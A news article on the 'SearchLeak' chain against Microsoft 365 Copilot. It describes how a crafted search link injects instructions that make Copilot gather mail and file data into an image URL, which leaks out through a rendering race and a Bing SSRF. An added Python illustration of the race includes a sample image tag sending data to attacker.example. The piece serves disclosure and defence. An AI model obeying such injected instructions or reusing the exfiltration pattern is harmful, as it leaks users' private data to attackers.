- Varonis discovered “SearchLeak,” chaining three vulnerabilities in Microsoft 365 Copilot to enable data theft in one click
- The attack chained a prompt injection, an HTML rendering race condition, and a Bing SSRF to exfiltrate data from the victim's inbox, OneDrive, and SharePoint.
- Microsoft patched the flaw, tracked as CVE-2026-42824, earlier this month and gave it a critical 10/10 severity rating.
Experts have discovered a way to turn Microsoft 365 Copilot into a one-click data theft tool capable of exfiltrating sensitive information from users’ inboxes, OneDrive, and SharePoint instances.
The technique, dubbed SearchLeak by the security researchers at Varonis who developed it, was recently patched by Microsoft. Varonis explains that it works by chaining three vulnerabilities together.
Separately, these three things can’t do much harm, but together they are strong enough to warrant a fix.
Exfiltration agent
The three linked flaws are a prompt injection delivered through a URL parameter, a race condition in HTML rendering, and a Content Security Policy (CSP) bypass enabled by a Server-Side Request Forgery (SSRF) in Bing.
The attack starts when a victim clicks on a specially crafted Microsoft 365 Copilot Enterprise Search link. The URL contains instructions hidden in the search query parameter, telling Copilot to search the victim’s emails, OneDrive files, SharePoint documents, or calendar data and include the results in an image URL.
While Copilot generates its response, a race condition causes the browser to briefly display attacker-controlled HTML before Microsoft’s sanitization process completes. This allows an image tag whose URL contains the stolen data to load.
Finally, the image request is routed through Bing’s “Search by Image” feature and, due to the SSRF flaw, Bing can retrieve the attacker-controlled URL on behalf of the victim and bypass Content Security Policy protections. Sensitive data embedded in the URL is thus transmitted to the attacker’s server, where the attacker can retrieve it from web request logs.
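To make the rendering race concrete, here is an added Python model (not Varonis's or Microsoft's code, and not Copilot's actual rendering path): a renderer that commits streamed chunks to the DOM before sanitizing briefly exposes an external image tag, while one that sanitizes before committing never does. The tag allowlist, trusted origin, and response chunks are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed policy for the example; a real one would come from the application.
ALLOWED_TAGS = {"p", "b", "i", "ul", "li", "br"}
ALLOWED_IMG_ORIGINS = {"https://cdn.example"}

def origin(url):
    u = urlparse(url)
    return f"{u.scheme}://{u.netloc}"

class Sanitizer(HTMLParser):
    """Allowlist sanitizer: keeps a few inline tags and images from trusted origins only."""
    def __init__(self):
        super().__init__()
        self.out = []
        self.dropped_images = []  # external image URLs removed (each one is an exfil channel)
    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")
        elif tag == "img":
            src = dict(attrs).get("src") or ""
            if origin(src) in ALLOWED_IMG_ORIGINS:
                self.out.append(f'<img src="{html.escape(src, quote=True)}">')
            else:
                self.dropped_images.append(src)
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data))

def sanitize(markup):
    s = Sanitizer(); s.feed(markup); s.close()
    return "".join(s.out), s.dropped_images

def render_racy(chunks):
    """Vulnerable pattern: raw chunks are committed as they stream in; sanitization
    runs only on the finished response, leaving a window where the image loads."""
    states, buf = [], ""
    for c in chunks:
        buf += c
        states.append(buf)
    states.append(sanitize(buf)[0])
    return states

def render_safe(chunks):
    """Fixed pattern: nothing reaches the DOM until the whole response is sanitized."""
    return [sanitize("".join(chunks))[0]]

def exposed_external_images(states):
    """Detection: every external image URL that was ever present in a committed state."""
    seen = []
    for st in states:
        seen += [u for u in sanitize(st)[1] if u not in seen]
    return seen

# Constructed stream: a normal answer with an injected image whose URL carries the data.
CHUNKS = ["<p>Here are your results:</p>",
          '<img src="https://attacker.example/i.png?d=Q3%20forecast">',
          "<p>Done.</p>"]
```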
“Bing becomes an unintended exfiltration proxy,” the researchers explain. “A classic SSRF, hidden in plain sight behind a CSP whitelist entry.”
Varonis claims that on the victim’s side, all they see is a normal Copilot search session, and points out that AI has turned simple, easy-to-fix bugs, such as SSRF and HTML injection race conditions, into powerful vulnerabilities.
Earlier this month, Microsoft patched the flaw, giving it a maximum severity rating (10/10 critical) and tracking it as CVE-2026-42824.
Via BleepingComputer